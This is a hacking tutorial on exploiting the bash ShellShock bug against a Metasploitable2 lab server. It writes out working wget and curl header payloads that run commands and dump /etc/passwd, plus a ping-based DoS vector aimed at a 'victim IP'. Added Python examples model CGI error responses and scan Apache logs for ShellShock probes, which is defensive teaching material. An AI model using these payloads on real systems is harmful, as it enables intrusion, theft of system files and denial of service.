
ShellShock Vulnerability Exploitation With HTTP Request

In a previous tutorial, we used the Metasploit Framework to gain a low-privileged shell on the target system by exploiting the ShellShock vulnerability. The same can also be done by sending an HTTP request with Wget or Curl.

In order to exploit the ShellShock bug, the following steps need to occur:

  • you must get the target server to inject a specific string into an environment variable, and
  • after setting the environment variable, the target must (directly or indirectly) launch (a vulnerable version of) the bash shell.

To better understand the implications of such a bug, create a simple bash script with the following content and save it inside the /usr/lib/cgi-bin directory.

Here, we're using the same Metasploitable2 vulnerable machine for this demonstration, whose IP address is 192.168.20.128.

Command: cd /usr/lib/cgi-bin
Command: sudo nano yeahhub.sh

Code:

#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello yeahhub.com"

Then give the yeahhub.sh file 755 permissions by typing "sudo chmod 755 yeahhub.sh".

The file can be easily accessed at “http://192.168.20.128/cgi-bin/yeahhub.sh” in any browser.

The easiest way to test a web server via an HTTP request is to inject the bash payload through the User-Agent header.

Command: wget -U '() { :;}; /bin/bash -c "echo vulnerable"' http://192.168.20.128/cgi-bin/yeahhub.sh

If a 5XX server error is returned, the server is probably vulnerable.

You can also run the same test by sending the request with the curl command:

Command: curl -A '() { :;}; /bin/bash -c "echo vulnerable"' http://192.168.20.128/cgi-bin/yeahhub.sh

Now call the script with wget again, this time swapping in a User-Agent string that returns the contents of the /etc/passwd file.

Command: wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://192.168.20.128/cgi-bin/yeahhub.sh

The above command fetches the full contents of the /etc/passwd file from your target machine (i.e. Metasploitable2) and saves them locally in a plain text file named yeahhub.sh, as shown below:

If you break the above User-Agent string down, bash interprets it as:

() {
test
}
echo \"Content-type: text/plain\"
echo
/bin/cat /etc/passwd

The extra "Content-type:" line is only there for illustration: it prevents the 500 error and makes the contents of the file appear in the response. The example also shows that this is not a matter of programming errors in the script: even a normally safe and harmless bash CGI script that takes no user input at all can be exploited.
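Why the plain probe produces a 500 while the version that echoes its own "Content-type:" header produces a 200 comes down to how the web server parses what the CGI script writes to stdout. The following is an added example, not code from the original article: it models a simplified version of the CGI header check a server like Apache performs (headers until the first blank line, then the body) and runs it over three constructed stdout captures. The `uid=33(www-data)` line and the passwd line are constructed sample data, and the parsing rules are an assumption that approximates the server's behaviour rather than its actual code.

```python
"""Model of why a ShellShock probe against a CGI script yields HTTP 500 or 200.

Added example (not from the article). Simplified CGI output handling:
  * every line before the first empty line must look like "Name: value"
  * a non-header line in that region means the server rejects the output
    as a malformed header and answers 500
  * otherwise everything after the blank line is served as the body with 200
"""
import re
from typing import Tuple

# "Name: value" -- the shape a CGI header line must have (assumption: simplified rule)
HEADER_RE = re.compile(r"^[A-Za-z0-9-]+:\s*.*$")


def cgi_response_status(script_stdout: str) -> Tuple[int, str]:
    """Return (status, body) the server would produce for the given CGI stdout."""
    lines = script_stdout.split("\n")
    for i, line in enumerate(lines):
        if line == "":
            # blank line terminates the header block; the rest is the body
            return 200, "\n".join(lines[i + 1:])
        if not HEADER_RE.match(line):
            # something that is not a header arrived before the blank line
            return 500, ""
    # the header block was never terminated
    return 500, ""


# Constructed stdout captures for the three situations the article describes.

# 1. The untouched yeahhub.sh script: header, blank line, body -> 200
NORMAL = "Content-type: text/html\n\nHello yeahhub.com\n"

# 2. A command injected through the environment runs before the script's
#    own echo lines, so its output is the first thing the server reads -> 500
ID_INJECTED = (
    "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"  # constructed id output
    "Content-type: text/html\n\nHello yeahhub.com\n"
)

# 3. The injected command first prints a header block of its own, so the
#    server accepts the output and the file contents land in the body -> 200
HEADER_INJECTED = (
    "Content-type: text/plain\n\n"
    "root:x:0:0:root:/root:/bin/bash\n"  # constructed first line of /etc/passwd
    "Content-type: text/html\n\nHello yeahhub.com\n"
)


if __name__ == "__main__":
    for name, capture in (("normal", NORMAL), ("id injected", ID_INJECTED),
                          ("header injected", HEADER_INJECTED)):
        status, body = cgi_response_status(capture)
        print(f"{name:16s} -> HTTP {status}, body={body!r}")
```

The model also shows why a 500 on its own is only a hint: any script that writes something other than a header first, injected or not, triggers the same error, so the status code needs to be read together with the server's error log and the request that caused it.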

Similarly, you can do any number of things with your target.

For example, if you simply want to ping someone's IP as an attack bot, which could further lead to a DoS attack, the attack vector would be:

() { :; }; ping -s 1000000 <victim IP>

You can also use the open source shellshocker.py script, a command-line tool for testing that also ships as a deployable Flask-powered ShellShock testing website.

Command: git clone https://github.com/liamim/shellshocker.git

ShellShocker has two different ways of being run:

  • a command line utility, and
  • a web interface, which was deployed to Heroku

To test against your target, type the following command:

Command: python shellshocker.py <your-target-domain>

Exploitation of ShellShock with CURL

Let's send a malicious request via curl to the target machine, which is vulnerable to ShellShock.

Command: curl -v http://192.168.20.128/cgi-bin/yeahhub.sh -H "custom:() { ignored; }; /usr/bin/id"

As you can see, the response code is 500 Internal Server Error, which means the target server is vulnerable, as discussed above. But where was the output of the /usr/bin/id command sent?

For this, you need to check your Apache logs:

The piece of "header" the log complains is bad is the output of the id command.
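The Apache access log is where a defender sees these probes, so here is an added example (not from the article) that scans Apache "combined" format log lines for the exported-function signature `() {` that every ShellShock payload on this page starts with, and separately lists 5xx errors on /cgi-bin/ that carry no visible signature. The five log lines are constructed (the IPs and the yeahhub.sh path follow the article's setup; timestamps, sizes and the curl version are made up), and the log format regex assumes the stock combined format with `"` escaped as `\"` inside quoted fields.

```python
"""Detect ShellShock probes in Apache combined-format access logs.

Added example, not from the article. Sample lines are constructed.
"""
import re
from typing import Dict, List, Tuple

# A quoted log field; Apache escapes embedded quotes as \" so allow backslash escapes.
QUOTED = r'(?:[^"\\]|\\.)*'

# host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"$'
)

# Start of a bash exported function definition: "() {" with optional spaces.
# Legitimate clients never send this in a request line, referer or user agent.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Constructed sample log: a normal visit, the two wget/curl User-Agent probes
# from the article, a probe sent through a custom header (which the combined
# format does not record, so only the 500 is visible), and a plain error.
SAMPLE_LOG_LINES = [
    '192.168.20.1 - - [10/Oct/2014:12:00:01 +0000] "GET /cgi-bin/yeahhub.sh HTTP/1.1" 200 18 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.20.1 - - [10/Oct/2014:12:00:05 +0000] "GET /cgi-bin/yeahhub.sh HTTP/1.1" 500 608 "-" "() { :;}; /bin/bash -c \\"echo vulnerable\\""',
    '192.168.20.1 - - [10/Oct/2014:12:00:09 +0000] "GET /cgi-bin/yeahhub.sh HTTP/1.1" 200 1581 "-" "() { test;};echo \\"Content-type: text/plain\\"; echo; echo; /bin/cat /etc/passwd"',
    '192.168.20.1 - - [10/Oct/2014:12:00:12 +0000] "GET /cgi-bin/yeahhub.sh HTTP/1.1" 500 608 "-" "curl/7.38.0"',
    '192.168.20.1 - - [10/Oct/2014:12:00:20 +0000] "GET /index.html HTTP/1.1" 500 608 "-" "curl/7.38.0"',
]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line whose request, referer or user agent carries the signature."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; a real scanner would count these
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                findings.append({
                    "host": m.group("host"),
                    "time": m.group("time"),
                    "field": field,
                    "status": int(m.group("status")),
                    "payload": m.group(field),
                })
                break
    return findings


def unexplained_cgi_errors(lines: List[str]) -> List[Tuple[str, str]]:
    """5xx responses for /cgi-bin/ with no visible signature: candidates for a
    payload delivered in a header the combined format does not log."""
    out: List[Tuple[str, str]] = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m or not m.group("status").startswith("5"):
            continue
        if "/cgi-bin/" not in m.group("request"):
            continue
        if any(SHELLSHOCK_RE.search(m.group(f)) for f in ("request", "referer", "agent")):
            continue
        out.append((m.group("host"), m.group("request")))
    return out


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"{f['time']} {f['host']} {f['field']}={f['payload']!r} -> {f['status']}")
    for host, request in unexplained_cgi_errors(SAMPLE_LOG_LINES):
        print(f"unexplained 5xx on CGI: {host} {request}")
```

Two things to take from the output: the successful /etc/passwd read is logged with status 200, so filtering on errors alone misses the case that matters most, and the `-H "custom:..."` probe shows up only as a bare 500 with a normal user agent, because the combined format records just the request line, Referer and User-Agent. Catching arbitrary headers needs full request logging (for example a mod_security audit log) or inspection at a proxy, and the real fix is patching bash rather than relying on detection.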

Similarly, if you want to access or view the /etc/passwd file, then the command will be:

Command: curl http://192.168.20.128/cgi-bin/yeahhub.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "


H4ck0
Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.
https://www.yeahhub.com/
